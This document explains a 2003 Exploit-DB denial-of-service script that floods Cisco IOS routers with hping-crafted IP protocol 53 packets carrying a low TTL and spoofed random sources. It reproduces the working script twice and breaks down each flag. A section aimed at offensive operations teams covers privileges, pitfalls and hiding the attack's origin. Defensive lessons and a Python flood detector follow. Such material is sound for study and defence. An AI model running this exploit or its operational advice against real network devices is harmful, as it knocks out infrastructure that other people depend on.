Cisco IOS hping Remote Denial of Service Exploit Explained

What this paper is
This paper describes a simple script that exploits a vulnerability in Cisco IOS devices to cause a Denial of Service (DoS). The exploit uses the hping tool to send specially crafted packets to the target device, overwhelming its ability to process them and rendering it unresponsive. The script is written in tcsh and requires hping to be installed.
Simple technical breakdown
The core of the exploit lies in sending a large number of packets with a specific IP protocol number (ipproto 53) and a controlled Time-To-Live (TTL) value. Cisco IOS, in certain versions, mishandles these packets, leading to a DoS condition. The script automates this process by repeatedly sending these packets using hping.
The vulnerability is related to how Cisco IOS handles certain IP protocols. By sending packets with IP protocol number 53 (the number registered for SWIPE, which the script's own comment refers to with "Uses swipe for the protocol bit"; this is an IP protocol number, not the UDP/TCP port 53 used by DNS) and manipulating the TTL, the script forces the device into a state where it consumes excessive resources trying to process these unexpected packets.
Complete code and payload walkthrough
The provided script is a tcsh shell script. Let's break down each part:
#!/bin/tcsh -f
#
# Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020
# Vulnerable versions - all Cisco devices running IOS.
# Requirements : tcsh, and hping.
# Get hping @ www.hping.org
#
# And you know the best part? This script actually works! Unlike the few .c's
# floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0,
# OR +s ciscodos.sh because of hping opening raw sockets.
#
# Example :
#
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# 64 bytes from 192.168.1.1: icmp_seq=0 ttl=150 time=1.287 ms
# 64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=0.817 ms
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 2 packets received, 0% packet loss
# round-trip min/avg/max/std-dev = 0.817/1.052/1.287/0.235 ms
#
# root@evicted # ./ciscodos.sh 192.168.1.1 0
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# -------------SNIP---------------
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 0 packets received, 100% packet loss
# -------------SNIP---------------
#
# Coded by zerash@evicted.org
#
if ($1 == "" || $2 == "") then
echo "usage: $0 <router hostname|address> <ttl>"
exit
endif
foreach protocol (53)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26
end
# milw0rm.com [2003-07-22]

- #!/bin/tcsh -f: This is the shebang line, indicating that the script should be executed with the tcsh shell. The -f flag prevents the script from reading commands from the user's ~/.tcshrc file, ensuring a clean execution environment.
- Comments: The lines starting with # are comments. They provide context about the exploit, its target, requirements, and usage examples.
  - Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020: Identifies the target and a Cisco documentation reference.
  - Vulnerable versions - all Cisco devices running IOS.: States the broad scope of affected devices.
  - Requirements : tcsh, and hping.: Lists the necessary tools.
  - Get hping @ www.hping.org: Provides a source for hping.
  - And you know the best part? This script actually works! Unlike the few .c's floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0, OR +s ciscodos.sh because of hping opening raw sockets.: This comment highlights the script's effectiveness and mentions the need for root privileges (uid=0) or the setuid bit (+s) on the script, because hping needs to open raw sockets, which typically requires elevated permissions.
  - The example section shows a ping command before and after running the exploit, demonstrating the loss of connectivity.
- if ($1 == "" || $2 == "") then ... endif: This is a conditional statement. $1 and $2 are positional parameters passed to the script: $1 is the first argument and $2 is the second.
  - $1 == "" || $2 == "": Checks if either the first or second argument is empty.
  - echo "usage: $0 <router hostname|address> <ttl>": If either argument is missing, it prints a usage message showing how to run the script, where $0 is the name of the script itself.
  - exit: Terminates the script if the arguments are invalid.
- foreach protocol (53) ... end: This loop iterates over a list of IP protocol numbers. In this case, the list contains only one number: 53.
  - protocol: This variable holds the current protocol number from the list during each iteration.
- /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26: This is the core command that sends the malicious packets.
  - /usr/local/sbin/hping: The path to the hping executable.
  - $1: The target IP address or hostname provided as the first argument.
  - --rawip: Tells hping to craft raw IP packets. hping constructs the entire IP header itself rather than relying on the operating system's network stack for certain parts. This is crucial for controlling specific IP header fields such as the protocol.
  - --rand-source: Makes hping use a random source IP address for each packet sent. This obscures the origin of the attack and makes it harder to block based on source IP.
  - --ttl $2: Sets the Time-To-Live (TTL) field in the IP header to the value provided as the second argument ($2). The TTL is a hop limit for packets.
  - --ipproto $protocol: Specifies the IP protocol number. Here it is set to 53 (the value from the foreach loop). This is the key to the vulnerability, as Cisco IOS is expected to handle this protocol in a way that leads to a DoS.
  - --count 76: Sends a total of 76 packets.
  - --interval u250: Sets the interval between packets to 250 microseconds (u250). This rapid sending rate contributes to the DoS.
  - --data 26: Appends 26 bytes of arbitrary data to the IP packet payload.
- # milw0rm.com [2003-07-22]: A comment indicating the source and publication date of the exploit.

Mapping of code fragments to practical purpose:
- #!/bin/tcsh -f: Script interpreter and execution environment setup.
- if ($1 == "" || $2 == "") then ... exit: Input validation for target and TTL.
- foreach protocol (53) ... end: Defines the IP protocol number to be abused.
- /usr/local/sbin/hping ...: The core packet crafting and sending mechanism.
- $1: Target specification.
- --rawip: Enables low-level IP packet construction.
- --rand-source: Obfuscates the attack origin.
- --ttl $2: Controls the packet hop limit, potentially triggering specific handling logic.
- --ipproto 53: Exploits a specific IP protocol handling vulnerability.
- --count 76: Controls the volume of packets sent.
- --interval u250: Controls the rate of packet transmission.
- --data 26: Adds a small payload, likely to satisfy packet structure requirements or trigger specific parsing logic.
Shellcode/Payload Explanation:
There is no traditional shellcode or multi-stage payload in this script. The "payload" is the hping command itself, which constructs and sends network packets. The effect is a Denial of Service on the target device, not the execution of arbitrary code. The script's goal is to crash or make the Cisco IOS device unresponsive.
Practical details for offensive operations teams
- Required Access Level: Root privileges (uid=0) on the attacking machine are required because hping needs to open raw sockets to craft IP packets. Alternatively, the script file (ciscodos.sh) could be made setuid root, but this is a significant security risk and generally not recommended.
- Lab Preconditions:
  - A target Cisco IOS device known to be vulnerable (based on the paper's claim of "all Cisco devices running IOS" at the time, though specific versions would be more precise).
  - Network connectivity from the attacker machine to the target device.
  - tcsh shell interpreter installed on the attacker machine.
  - hping (a version compatible with the exploit's options) installed on the attacker machine, typically at /usr/local/sbin/hping or a similar location.
- Tooling Assumptions:
  - The exploit relies heavily on hping. The specific version of hping might matter, especially regarding its support for --rawip, --rand-source, and --ipproto.
  - The tcsh shell is assumed to be available and functional.
- Execution Pitfalls:
  - Firewalls/ACLs: Network devices (firewalls, Access Control Lists on routers) between the attacker and the target can block the outgoing hping packets or the incoming responses (if any were expected).
  - hping Version Compatibility: Older or newer versions of hping might not support all the specified options, or their behavior might differ.
  - Insufficient Privileges: Failure to run as root or to have the script setuid will prevent hping from opening raw sockets, leading to an immediate failure.
  - Target Specificity: While the paper claims "all Cisco devices running IOS," real-world testing would be needed to confirm exact vulnerable versions and device types. Modern IOS versions are likely patched.
  - TTL Value: The choice of TTL ($2) is critical. A TTL of 0 is used in the example, meaning the packet is intended to be processed by the first hop (the target router itself) rather than forwarded. A TTL that is too low expires in transit before the packet reaches the target; a higher value may cause the target to process the packet differently.
  - --rand-source effectiveness: While it helps, sophisticated network monitoring might still detect unusual traffic patterns.
  - Rate Limiting/IPS: Modern Intrusion Prevention Systems (IPS) or rate-limiting mechanisms on network devices could detect and block this type of attack.
- Expected Telemetry:
  - Attacker Side:
    - hping process running.
    - Network traffic originating from the attacker's IP (or random IPs if --rand-source is effective) towards the target IP.
    - tcsh script execution logs.
    - If hping fails due to permissions, error messages from hping indicating issues with raw socket creation.
  - Target Side (if observable):
    - High CPU utilization on the Cisco IOS device.
    - Network interface statistics showing a high volume of incoming packets on the targeted protocol.
    - Loss of connectivity to the device (e.g., inability to ping, SSH, or Telnet).
    - Device logs might show errors related to packet processing, protocol handling, or resource exhaustion.
    - The device might reboot or enter a crash state.
Where this was used and when
- Context: This exploit was developed and published in 2003. At that time, Cisco IOS devices were widely deployed, and vulnerabilities like this were actively sought and exploited. The paper mentions "recent Cisco IOS vuln. Cisco doc. 44020," indicating it was a known issue within Cisco's security advisories.
- Usage: Such exploits were typically used by security researchers to demonstrate vulnerabilities, by malicious actors for disruptive attacks, or by penetration testers during authorized engagements to assess network resilience. The script's simplicity and reliance on common tools like hping made it accessible.
Defensive lessons for modern teams
- Patch Management: The most crucial lesson is the importance of timely patching. Cisco IOS vulnerabilities are regularly discovered and patched. Keeping devices updated is paramount.
- Network Segmentation and ACLs: Implementing robust Access Control Lists (ACLs) on network devices can prevent unauthorized traffic from reaching critical infrastructure. Limiting which protocols and source IPs can reach management interfaces or sensitive network segments is vital.
- Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS solutions are designed to detect and block anomalous traffic patterns, including malformed packets, unusual protocol usage, and high-volume packet floods, which this exploit relies on.
- Rate Limiting: Implementing rate limiting on network interfaces and management ports can mitigate DoS attacks by capping the number of packets or connections a device will accept within a given time frame.
- Protocol Validation: Network devices should perform thorough validation of IP headers and protocol payloads. Unexpected or malformed protocol usage should be logged and potentially dropped.
- Secure Configuration: Disabling unnecessary services and protocols, and hardening device configurations, reduces the attack surface.
- Monitoring and Alerting: Comprehensive network monitoring and alerting systems can detect unusual activity (e.g., sudden spikes in traffic, high CPU usage on network devices) that might indicate an ongoing attack.
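The telemetry signature described above (many packets of an unexpected IP protocol, TTL low enough that the router itself must process them, spread across many source addresses because of --rand-source) can be checked on captured traffic. The following is an added example, not code from the original paper: it decodes raw IPv4 headers as hping's "--rawip --ipproto 53 --ttl 0 --data 26" puts them on the wire (20-byte header plus 26 data bytes) and flags protected routers receiving such a flood. Addresses other than the paper's 192.168.1.1 and the thresholds are constructed assumptions.

```python
import ipaddress
import struct
from collections import defaultdict

TARGET = "192.168.1.1"   # router address used in the paper's example
PROTO_SWIPE = 53         # IP protocol 53 (SWIPE); not UDP/TCP port 53 (DNS)
IPV4_HDR = "!BBHHHBBH4s4s"  # ver/ihl, tos, total len, id, flags/frag, ttl, proto, csum, src, dst

def build_ipv4(src, dst, proto, ttl, payload_len):
    """Constructed test packet: minimal 20-byte IPv4 header (checksum left 0) + zero payload."""
    hdr = struct.pack(IPV4_HDR, 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    return hdr + b"\x00" * payload_len

def parse_ipv4(pkt):
    """Return (src, dst, proto, ttl, total_len) decoded from a raw IPv4 packet."""
    ver_ihl, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack(IPV4_HDR, pkt[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    return (str(ipaddress.ip_address(src)), str(ipaddress.ip_address(dst)),
            proto, ttl, total_len)

def detect_ipproto_flood(packets, protected_hosts, watched_protos=(PROTO_SWIPE,),
                         min_packets=10, min_sources=5):
    """Flag protected hosts that receive >= min_packets of a watched IP protocol with
    TTL <= 1 (locally processed, not forwarded) from >= min_sources distinct sources,
    the pattern --rand-source produces. Returns {dst: (packet_count, distinct_sources)}."""
    seen = defaultdict(lambda: [0, set()])
    for pkt in packets:
        src, dst, proto, ttl, _ = parse_ipv4(pkt)
        if dst in protected_hosts and proto in watched_protos and ttl <= 1:
            seen[dst][0] += 1
            seen[dst][1].add(src)
    return {dst: (count, len(srcs)) for dst, (count, srcs) in seen.items()
            if count >= min_packets and len(srcs) >= min_sources}

def sample_traffic():
    """Constructed capture: 76 protocol-53 packets from varying sources (as --count 76 with
    --rand-source would produce) plus two benign packets that must not be flagged."""
    pkts = [build_ipv4(f"10.{i % 200}.{(i * 7) % 250}.{i % 255 + 1}", TARGET, PROTO_SWIPE, 0, 26)
            for i in range(76)]
    pkts.append(build_ipv4("192.168.1.50", TARGET, 1, 64, 64))            # ordinary ICMP to router
    pkts.append(build_ipv4("192.168.1.50", "192.168.1.20", PROTO_SWIPE, 0, 26))  # not a router
    return pkts

if __name__ == "__main__":
    print(detect_ipproto_flood(sample_traffic(), {TARGET}))  # {'192.168.1.1': (76, 76)}
```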
ASCII visual (if applicable)
This exploit is a direct network-to-device interaction. An ASCII visual can illustrate the packet flow.
+-----------------+       +-----------------+       +-----------------+
| Attacker Machine| ----> | Network Devices | ----> | Cisco IOS Device|
| (running tcsh   |       | (Routers,       |       | (Target)        |
| and hping)      |       | Firewalls)      |       |                 |
+-----------------+       +-----------------+       +-----------------+
        |                                                    |
        | Sends crafted packets with                         | Receives packets
        | --ipproto 53, --ttl X, --rand-source               | and attempts to
        | --rawip, high rate                                 | process them.
        |                                                    |
        |                                                    | If vulnerable,
        |                                                    | enters DoS state
        |                                                    | (crash/unresponsive).
        |                                                    |
        +--------------------------------------------------->|

This diagram shows the attacker sending packets through the network to the target Cisco IOS device. The key is the crafted nature of the packets (--ipproto 53, --ttl X, etc.) that exploits the device's handling of protocol 53.
Source references
- Paper Title: Cisco IOS - using hping Remote Denial of Service
- Author: zerash
- Published: 2003-07-22
- Keywords: Hardware,dos
- Paper URL: https://www.exploit-db.com/papers/62
- Raw URL: https://www.exploit-db.com/raw/62
Original Exploit-DB Content (Verbatim)
#!/bin/tcsh -f
#
# Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020
# Vulnerable versions - all Cisco devices running IOS.
# Requirements : tcsh, and hping.
# Get hping @ www.hping.org
#
# And you know the best part? This script actually works! Unlike the few .c's
# floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0,
# OR +s ciscodos.sh because of hping opening raw sockets.
#
# Example :
#
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# 64 bytes from 192.168.1.1: icmp_seq=0 ttl=150 time=1.287 ms
# 64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=0.817 ms
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 2 packets received, 0% packet loss
# round-trip min/avg/max/std-dev = 0.817/1.052/1.287/0.235 ms
#
# root@evicted # ./ciscodos.sh 192.168.1.1 0
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# -------------SNIP---------------
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 0 packets received, 100% packet loss
# -------------SNIP---------------
#
# Coded by zerash@evicted.org
#
if ($1 == "" || $2 == "") then
echo "usage: $0 <router hostname|address> <ttl>"
exit
endif
foreach protocol (53)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26
end
# milw0rm.com [2003-07-22]